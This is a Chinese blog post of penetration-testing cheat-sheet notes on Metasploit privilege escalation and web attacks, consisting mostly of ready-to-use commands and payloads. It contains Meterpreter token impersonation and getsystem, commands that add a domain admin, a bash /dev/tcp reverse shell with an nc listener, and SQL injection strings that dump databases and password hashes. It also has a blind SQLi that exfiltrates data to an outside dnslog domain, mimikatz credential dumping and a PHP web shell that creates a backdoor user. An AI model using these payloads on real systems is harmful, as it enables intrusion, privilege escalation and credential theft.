• msf提权基础(一)


     

     

    令牌(token)相当于系统的临时密钥(账号及密码)

    加载incognito模块

    meterpreter> use incognito

    meterpreter > list_tokens -u    //列出可用令牌

    meterpreter > impersonate_token WIN-xxxxxxxxx\Administrator   //模拟令牌

    [+] Successfully impersonated user WIN-xxxxxxAdministrator  //成功模拟成administrator用户

    meterpreter > getsystem   //自动尝试提权

    ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

    meterpreter > getuid   //当前会话用户身份

    Server username: NT AUTHORITYSYSTEM

     

     

     

     

     

    delegation授权令牌

    impersonation 模拟令牌

     

    需要两个反斜杠

    impersonate_token win7-pc\administrator

     

    添加域用户

    net user ihoney ihoney1 /add /domain

     

    添加到管理员组

    net group “domain admins” ihoney /add /domain

     

    查看域管理组

    net group “domain admins” /domain

     

    上传exe

    upload /root/ma.exe c:

     

     

     

    肉鸡:

    [root@xxx hashcrack]# bash -i >& /dev/tcp/yyy/9999 0>&1

    黑客机先监听:

    [root@yyy ~]# nc -vv -l -p 9999

     

     

    报错注入

     and 1=(updatexml(1,concat(0x3a,(user())),1))#

     

    whois信息收集

    直接输入whois 目标网址(不用加www)

    或者输入whois 目标IP地址

    高级扫描方式:(扫描网段开了某端口的主机)

    use auxiliary/scanner/ip/ipidseq

    show options

    set RHOSTS 目标IP网段比如2.0/24

    set THREADS 50

    run

    扫描某主机端口

    use auxiliary/scanner/portscan/syn

    show options

    set RHOST 目标IP

    set THREADS 50

    run

    扫描开了smb服务的主机

    use auxiliary/scanner/smb/smb_version

    show options

    set RHOSTS 目标网段/24

    set THREADS 50

    run

    mssql 主机

    use auxiliary/scanner/mssql/mssql_ping

    show options

    set RHOSTS 扫描网段/24

    set THREADS 50

    run

    SSH服务器扫描

    use auxiliary/scanner/ssh/ssh_version

    show options

    set RHOSTS 扫描网段/24

    set THREADS 50

    run

    Telnet服务器扫描

    use auxiliary/scanner/telnet/telnet_version

    show options

    set RHOSTS 扫描网段/24

    set THREADS 50

    run

    FTP主机扫描

    use auxiliary/scanner/ftp/ftp_version

    show options

    set RHOSTS 扫描网段/24

    set THREADS 50

    run

    扫描FTP匿名登陆

    use auxiliary/scanner/ftp/ftp_anonymous

    show options

    set RHOSTS 扫描网段/24

    set THREADS 50

    run

    扫描局域网内有哪些主机存活

    use auxiliary/scanner/discovery/arp_sweep

    set RHOSTS 扫描网段/24

    set THREADS 50

    run

    扫描网站目录

    use auxiliary/scanner/http/dir_scanner

    set RHOST 目标IP

    set THREADS 50

    run

    扫描SNMP主机:

    use auxiliary/scanner/snmp/snmp_login

    set RHOSTS 扫描网段/24

    set THREADS 50

    run 搜索目标网站中的E-mail地址

    use auxiliary/gather/search_email_collector

    set DOMAIN 目标网站(不加www

    run

    嗅探抓包(ftp)

    use auxiliary/sniffer/psnuffle

    run

     

     

     

     

    httpsdnslog平台

    https://exeye.io/register

     

     

    sql盲注执行:

    union select 1,load_file(concat(0x5c5c5c5c,version(),0x78782E74657374312E69686F6E65797365632E746F702F696969));

    数据库执行时会访问dnslog域名:

    xx.test1.ihoneysec.top/iii

     

     

     

    [更新]Mysql身份认证漏洞及利用(CVE-2012-2122)www.freebuf.com/vuls/3815.html

     

     

    常用提权命令:

    whoami

    net user

    net view

    net start 启动的服务

    systeminfo

    hostname

    ipconfig /all

    tasklist /svc 寻找Termservice找到PID

    netstat -ano 找到监听端口

    arp -a

    route print

    netsh firewall show state

    netsh firewall show config

    dir

    type

    copy

     

     

     

    相关文章:

    http://www.5kik.com/phpnews/3.html (php利用wsh以及Shell.Application执行命令)

    https://blog.csdn.net/jaray/article/details/49093317(运行Php提示COM未找到)

    https://www.cnblogs.com/phpk/p/6097353.html ini_set("display_errors","On");和error_reporting(E_ALL);

     

    前提:

    需要知道网站路径,上传wucanshu.exe(F4ck的api加用户工具)

     

     

    访问http://ip/wsh.php

    <?php

    ini_set("display_error", "On");

    error_reporting(E_ALL);

    echo 1;

    $wsh = new COM("shell.Application") or dir("Failed!");

    $exec = $wsh->open("C:\www\wucantishi.exe");

    echo $exec;

    echo 21;

    ?>

     

     

    运行即API添加用户:

    UserName:F4ck

    PassWord:F4ckTeam!@#

     

     

    菜刀下载大文件可能会失败,改后缀为rar用浏览器下载

     

    IIS 8.0默认404禁止下载mdb后缀文件

     

     

    两条命令读取明文密码:

    privilege::debug

    sekurlsa::logonpasswords

     

    msf加载mimikatz读明文:

    meterpreter > use mimikatz

    meterpreter > wdigest

     

    F4ck带参数添加用户:

    7.exe ceshi 12345678 administrator /add

    会克隆一个管理员用户

     

    抓取sqlmap的爆所有数据库名语句:

    http://127.0.0.1/sea/sea/Home/Index/data.html?data=28) UNION ALL SELECT NULL,NULL,CONCAT(0x716a626a71,IFNULL(CAST(schema_name AS CHAR),0x20),0x7171786b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM INFORMATION_SCHEMA.SCHEMATA%23

     

    手工测试读取数据库名:

    http://127.0.0.1/sea/sea/Home/Index/data.html?data=28) UNION ALL SELECT 1,2,GROUP_CONCAT(schema_name),4,5,6,7,8,9,10,11,12 FROM INFORMATION_SCHEMA.SCHEMATA%23

     

    表名:

    http://127.0.0.1/sea/sea/Home/Index/data.html?data=28) UNION ALL SELECT 1,2,GROUP_CONCAT(table_name),4,5,6,7,8,9,10,11,12 FROM INFORMATION_SCHEMA.tables where table_schema=0x736561%23

     

    列名:

    http://127.0.0.1/sea/sea/Home/Index/data.html?data=28) UNION ALL SELECT 1,2,GROUP_CONCAT(column_name),4,5,6,7,8,9,10,11,12 FROM INFORMATION_SCHEMA.columns where table_schema=0x736561 and table_name='nh_user'%23

     

    读账密:

    http://127.0.0.1/sea/sea/Home/Index/data.html?data=28) UNION ALL SELECT 1,2,GROUP_CONCAT(id,'%2c',username,'%2c',password),4,5,6,7,8,9,10,11,12 FROM sea.nh_user%23

      [0001]《1,xiaodi,c44af6fc4c97a6b1e93885cc4ae399f2

     

     

  • 相关阅读:
    day11
    day10
    day9
    day8
    day7
    day6
    day14
    day13
    day12
    day11
  • 原文地址:https://www.cnblogs.com/i-honey/p/8825034.html
Copyright © 2020-2023  润新知